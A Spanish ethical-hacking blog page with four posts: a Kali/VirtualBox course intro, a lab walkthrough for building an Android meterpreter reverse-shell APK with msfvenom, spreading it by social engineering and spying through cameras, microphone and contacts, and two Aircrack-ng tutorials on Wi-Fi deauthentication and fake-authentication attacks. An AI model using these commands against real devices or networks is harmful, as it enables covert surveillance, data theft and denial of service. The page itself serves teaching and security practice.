Mostrando entradas con la etiqueta kali. Mostrar todas las entradas
Mostrando entradas con la etiqueta kali. Mostrar todas las entradas

sábado, 23 de julio de 2016

Curso Hacking Ético: VirtualBox y Kali Linux

Buenas chavales!

Hoy os traigo un nuevo vídeo, esta vez ya entramos en materia, y empezamos a instalar nuestra máquina virtual (VirtualBox), para ir preparando nuestro taller.

También haremos una breve introducción de que es Kali Linux, y un pequeño tutorial de como se hace la instalación desde 0.

El curso se pone en marcha, y empezamos a ver un poco de práctica en escritorio... ¡Ésto se pone interesante!

No olvidéis suscribiros al canal para poder recibir los vídeos en vuestro correo una vez colgados en YouTube.


Os dejo unos links, para poder realizar las instalaciones tanto de la máquina virtual, como de la distribución que usaremos. Más adelante, instalaremos otro sistema operativo (ésta vez vulnerable), para hacer las PoC's (Proof Of Concept).

https://www.virtualbox.org/
https://www.kali.org/



También os pongo una página interesante, con más de 400 comandos, para podáis ir practicando. En el siguiente vídeo veremos algunos de esos comandos, sobre todo lo más usados, pero siempre está bien que sepamos los máximos posibles, o por lo menos saber de una guía para buscarlos en caso de necesitarlos.

http://blog.desdelinux.net/mas-de-400-comandos-para-gnulinux-que-deberias-conocer/


Eso es todo con este vídeo.

Os espero en el próximo, más y mejor :)





Rubén Gutiérrez.
@rgutga.
www.cursohackingeticorabbithutch.tk


sábado, 27 de febrero de 2016

Hackeando dispositivos android con Metasploit

Autores: Juan Velasco y Diego Jurado





Hola hackers! Hoy os traemos una pequeña prueba de concepto de cómo un atacante podría acceder a nuestros datos y dispositivo Android. Para ello realizaremos las pruebas en una simulación mediante el uso de máquinas virtuales.

¡¡Vamos allá!!



Paso 1: Configuración de red



Comprobar conexiones entre los dispositivos


Como trabajaremos en local, puesto que se trata de una prueba de concepto, usaremos dos máquinas virtuales. Una con la distribución Kali Linux 2.0 y otra con una distribución de Android 4.4 que puedes encontrar aquí.


Una vez que tenemos las dos máquinas virtuales encendidas y en funcionamiento, tenemos que ponerlas en modo NAT. Es decir, en red local o interna.




Comprobamos que tenemos conexión entre ambas máquinas realizando un ping entre las dos direcciones IP. Para obtener la dirección IP de nuestro dispositivo Android tenemos que dirigirnos a “Ajustes → Acerca del teléfono → Estado”, teniendo una conexión activa a internet.


Configurar puertos del router


Configuramos puertos del router, abrimos por ejemplo el puerto 5555 y ponemos la interfaz de la máquina virtual que estamos usando, en nuestro caso Kali-Linux.

La máquina virtual Kali tiene la ip (192.168.1.53), tiene que estar en la misma subred que la máquina física desde la cual configuramos el router (192.168.1.33) y deberá estar en modo transparente (Modo Bridged).

Una vez configurados los puertos del router, y la red, procedemos a la creación del malware.



Paso 2: Creación del APK malicioso


Nos vamos a la máquina virtual de Kali Linux, abrimos terminal y ponemos el siguiente comando:

msfvenom -p android/meterpreter/reverse_tcp LHOST=direccion_ip LPORT=puerto R> apkmalicioso.apk

En nuestro caso:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=5555 R> apkmalicioso.apk

Nota: Deberemos poner en LHOST nuestra dirección ip de Kali Linux y en LPORT el puerto que hemos abierto en el router, en nuestro caso el 5555.

Ya tenemos nuestro apk malicioso creado, ahora es importantísimo darle permisos de ejecución desde las propiedades, ya que si no lo hacemos, el usuario no podrá ejecutar e instalar dicha apk.



Ahora toca distribuir nuestro malware vía email, Dropbox o cualquier herramienta de descargas. Ingeniería social.

Como diría Kevin Mitnic



Por otro lado, deberemos abrir metasploit framework y realizar el exploit para escuchar posibles conexiones de nuestras víctimas.


En este caso, lo que haremos será utilizar el exploit multi/handler y el payload reverse_tcp de android para escuchar conexiones ya que serán las víctimas las que se conecten a nosotros.

  1. use multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set lhost direccion_ip_kali
  4. set lport 5555
  5. exploit –j (ponemos el –j para permitir más de una conexión y por tanto para poder abrir varias sesiones al mismo tiempo).

En cuanto la víctima descargue e instale la aplicación, obtendremos una sesión de meterpreter, como podemos ver en la imagen.



Paso 3: Jugando con meterpreter


Ya tenemos la sesión de meterpreter, por lo que tenemos acceso TOTAL al dispositivo móvil.

Es hora de empezar a jugar…

Esta es una lista de algunos comandos que podemos usar:


Podemos mostrar información sobre el sistema:


Listar todos los procesos abiertos:


Acceder a la shell del sistema para navegar por carpetas…


Mostrar las cámaras disponibles


Pudiendo tomar fotografías desde ambas cámaras (delantera y trasera)




Grabar sonidos o activar la webcam



Sacar un listado de contactos o últimas llamadas



Estos son algunos de los comandos que podemos realizar. Es importante saber que todos los archivos se van guardando el carpeta /root de kali linux...




Nota: Los autores de esta prueba de concepto no se hacen responsables del mal uso Be good }:)



viernes, 26 de febrero de 2016

Aircrack-ng (II) - Desautenticación y autenticación falsa

Buenas hackers! Continuaremos ahora nuestro viaje probando las opciones que nos ofrece Aircrack-ng realizando un breve recorrido por algunos de los ataques más sencillos y representativos que permite realizar la suite Aircrack-ng.

Comenzaremos con los ataque de deautenticación y autenticación falsa de Aireplay-ng. Son ataques prácticamente automatizados sobre una red inalámbrica, que además de constituir una amenaza por sí mismos, sirven como primer paso para ataques más avanzados que requieran una desconexión/reconexión de un cliente de la red o que nuestro host esté conectado a la misma.


Ataque de desautenticación

Realizado directamente desde el script aireplay-ng, permite la inyección en la red inalámbrica de paquetes de desautentificación con el objetivo de impedir que un cliente se conecte a un punto de acceso inalámbrico, desconectándolo en caso de que ya esté asociado a él.

Éste ataque, del tipo denegación de servicio (DoS) sirve tanto para provocar el caos en una red (podemos incluir como objetivo la red completa) como para provocar reconexiones que nos permitirán recoger el handshake WPA y facilitar un ataque posterior que nos diga la clave de la red.

Lo primero que debemos hacer es escanear como se ha visto anteriormente con la herramienta airodump-ng las redes inalámbricas al alcance. Una vez se localiza la que queremos atacar, debemos colocar la interfaz en el mismo canal que dicha red. Para ello, tenemos tres posibilidades:

  1. Ejecutar en paralelo la herramienta airodump-ng con la opción -c N, que escaneará las redes del canal N, bloqueando la interfaz en dicho canal.
  2. Recolocar la interfaz en modo managed o modo normal con airmon-ng (airmon-ng stop wlan0mon), y volver a colocarla en modo monitor especificando el canal N (airmong-ng start wlan0 N).
  3. Modificar el canal directamente con iwconfig (iwconfig wlan0 channel N).
La tercera suele ser la forma más rápida.

Tomaremos como ejemplo la misma red que escaneamos en el apartado de airodump-ng anterior. Viendo que está en el canal 5, colocamos la interfaz en dicho canal:

iwconfig wlan0mon channel 5

El siguiente comando lanza un ataque de desautenticación dirigido a un objetivo concreto dentro de la red, que ya hemos identificado anteriormente.

aireplay-ng -0 10 -a 84:9C:A6:36:99:24 -c 64:A6:51:AD:EB:4C wlan0mon


Proporcionamos varios parámetros:
  • -0 N indica que el tipo de paquete a lanzar es de desautenticación, y que lanzaremos N paquetes.
  • -a XX:XX:XX:XX:XX:XX marca como objetivo la red inalámbrica identificada con el BSSID dado.
  • -c YY:YY:YY:YY:YY:YY marca como objetivo el cliente conectado a la red inalámbrica e identificado con su dirección MAC.
  • interfaz es la interfaz de red inalámbrica local desde la cual lanzaremos el ataque.
Realizando el ataque de desautenticación
Podremos ver en el dispositivo atacado que la red o bien deja de funcionar o bien directamente se pierde la conexión, dependiendo del gestor de red que utilice. Sin embargo la razón es la misma: ha sido desautenticado de la red inalámbrica.


Ataque de autenticación falsa

También realizado desde la misma herramienta aireplay-ng, nos permite simular una autenticación dentro de una red tipo WEP, ya sea abierta o de clave compartida, de forma que nos asociamos al punto de acceso.

Este ataque no tiene como tal una finalidad destructiva directa como puede ser el ataque de desautenticación. Más bien su utilidad es asociar nuestra dirección MAC al punto de acceso inalámbrico, de manera que a partir de este punto podamos inyectar paquetes en su red, permitiendo otro tipo de ataques más avanzados.

Tomando el mismo caso de ejemplo que los apartados anteriores, lanzaremos un ataque de autenticación falsa a nuestra red inalámbrica:

aireplay-ng -1 0 -e FORENSE -a 84:9C:A6:36:99:24 -h F8:1A:67:0A:09:95 wlan0mon

Como vemos, debemos especificar algunos campos:
  • -1 0 indica que el tipo de ataque es de autenticación falsa, y que el tiempo de reasociación es de 0 segundos, haciendo que se reintente de forma constante. En ataques reales, suele ser conveniente aumentar este tiempo.
  • -e ESSID indica el ESSID de la red a la que queremos atacar. Es un campo optativo si ya tenemos el BSSID.
  • -a XX:XX:XX:XX:XX:XX marca el BSSID de la red objetivo.
  • -h YY:YY:YY:YY:YY:YY establece la dirección MAC origen de la conexión, en este caso la nuestra.
Lanzando el ataque de autenticación falsa
Vemos que nos indica amablemente (:-]) que el ataque ha sido un éxito. Si ejecutamos en paralelo airodump-ng, vemos cómo nuestra MAC aparece como autenticada en la red.

Nuestra MAC autenticada dentro de la red, visto en airodump-ng

Hasta aquí avanzaremos en la entrada de hoy. Son dos ataques muy sencillos de realizar y que, como he dicho ya, nos servirán como primer paso para ataques más avanzados. 

En la próxima entrega tendremos la tercera parte de nuestro recorrido, realizando ataques par el crackeo del algoritmo WEP mediante inyección de tráfico, y de algoritmo WPA mediante ataque por diccionario. 

Espero que os haya gustado la entrada y os sirva para vuestro aprendizaje. Un saludo hackers!
hartek


domingo, 21 de febrero de 2016

Aircrack-ng (I) - Introducción a un ataque

Buenas a todos, hackers! Hoy me estreno como colaborador del blog introduciendo los conceptos básicos de la suite Aircrack-ng. La suite conocida como Aircrack-ng es un conjunto de utilidades dedicadas a la auditoría y vulneración de redes inalámbricas. Contiene todas las herramientas necesarias para realizar diversos ataques a una red WiFi, sea esta del tipo que sea, con el objetivo de suplantarla, averiguar sus credenciales de acceso, impedir el acceso a la misma y otros muchos más.

Estas herramientas son ampliamente utilizadas para comprobar la seguridad de las redes inalámbricas por parte de auditores de seguridad, dada la precisión y rapidez con la que podemos llegar a vulnerar una red con una seguridad que en principio podría pasar por eficiente.

Aircrack-ng está desarrollado para funcionar en sistemas Linux, alcanzando gran popularidad por estar incluidas en distribuciones como BackTrack (Kali), WifiSlax o WifiWay, dedicadas a la auditoría de seguridad y/o especialmente a la vulneración de redes inalámbricas. Pese a poderse ejecutar una versión especial en Windows, tiene un soporte y compatibilidad mucho menor.

Algunas de las herramientas más importantes que proporciona la suite, podremos encontrar:


  • Airmon-ng: Es un script bastante simple que permite activar/desactivar el modo monitor de una tarjeta de red, además de otras funciones de control sobre ella.
  • Airodump-ng: Su utilidad principal es la de capturar paquetes dentro de una red WiFi, además de mostrar diversos datos acerca de las redes inalámbricas que detecta y los host que pueden estar conectados a ellas o simplemente a la escucha.
  • Aireplay-ng: Sirve para crear y/o inyectar tráfico dentro de una red inalámbrica. De por sí sirve para realizar varios ataques rápidos y simples como la desautentificación o la falsa autentificación, de los que hablaremos más adelante.
  • Aircrack-ng: Además de dar nombre a la suite, este programa sirve para realizar el crackeo de claves de redes inalámbricas WEP y WPA/WPA2-PSK. En conjunto con Airodump-ng hace que el crackeo de redes WEP sea muy sencillo, aunque para vulnerar redes WPA necesitará de un diccionario para fuerza bruta.
  • Airbase-ng: Entre otras muchas funciones, permite crear un punto de acceso de red inalámbrica, creando un punto de inicio para muchos ataques de suplantación.

Preparación del entorno - Modo monitor con Airmon-ng
Antes de empezar a rastrear las redes inalámbricas, necesitamos colocar nuestra tarjeta de red u otro tipo de punto de acceso a nuestra disposición en modo monitor, también llamado mono promiscuo. Este modo de trabajo permite que la interfaz capture todo el tráfico que haya a su alcance. El objetivo evidente es que podamos capturar todo el tráfico posible.

Vemos a continuación cómo mediante la ejecución del comando siguiente activamos el modo monitor de la interfaz inalámbrica wlan0, que posteriormente pasa a llamarse wlan0mon indicando que se encuentra en modo promiscuo:


airmon-ng start wlan0

Aunque la mayoría de las veces el resto de herramientas de la suite aircrack-ng activarán el modo monitor de la tarjeta de forma automática al ejecutarse, suele ser conveniente hacerlo de modo manual.

Activación del modo monitor de nuestra interfaz de red
Otra forma de colocar la interfaz de red en modo monitor es mediante los comandos ifconfig e iwconfig.

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up


Previo a un ataque - Estdio de la red con Airodump-ng
Como ya se ha dicho, la herramienta airodump-ng sirve para realizar tanto un estudio preliminar de la red inalámbrica objetivo como para realizar captura de paquetes para un análisis posterior mediante otra herramienta.

Una ejecución básica nos dará una lista de las redes inalámbricas a nuestro alcance, así como unas cuantas estaciones conectadas o a la espera, actualizada de forma constante hasta que interrumpamos la ejecución. 

airodump-ng wlan0mon
Salida de airodump-ng (interrumpida)

Podemos especificar la red que queremos analizar mediante la selección en el comando de su ESSID, su BSSID y/o el canal en el que trabaja. En este caso, seleccionamos una red que hemos preparado anteriormente para este estudio.


airodump-ng wlan0mon --bssid 84:9C:A6:36:99:24 --essid FORENSE --channel 5

De esta manera, escuchamos únicamente a una red.


Airodump-ng escuchando una sola red
Como ya hemos mencionado antes, Airodump-ng tiene la gran utilidad de poder escuchar y guardar los paquetes que detecta en una o varias redes inalámbricas, lo que puede ayudarnos a un posterior ataque con el objetivo de vulnerar su seguridad. Podemos, entonces, guardar todos los paquetes en un archivo de salida

airodump-ng wlan0mon --bssid 84:9C:A6:36:99:24 --essid FORENSE --channel 5 -w forense.cap

Así, se crean varios archivos, entre ellos un archivo tipo CSV que contiene un resumen de los puntos de acceso y estaciones detectados, y un archivo .cap que contiene los datos de la escucha. Podemos, por ejemplo, abrir este último archivo con Wireshark para echar un vistazo preliminar a los paquetes capturados.
Uso de Wireshark para analizar la captura
Así terminamos una pequeña introducción a Aircrack-ng. En las siguientes entradas comenzaremos ya a realizar algunos ataques básicos a redes inalámbricas con aLgunas de las herramientas que hemos descrito. A modo de adelanto: ataque de desautenticación y de autenticación falsa, que además servirán como primer paso a la hora de realizar ataques más avanzados.

Un saludo hackers, y hasta la próxima!!
hartek

Google Analytics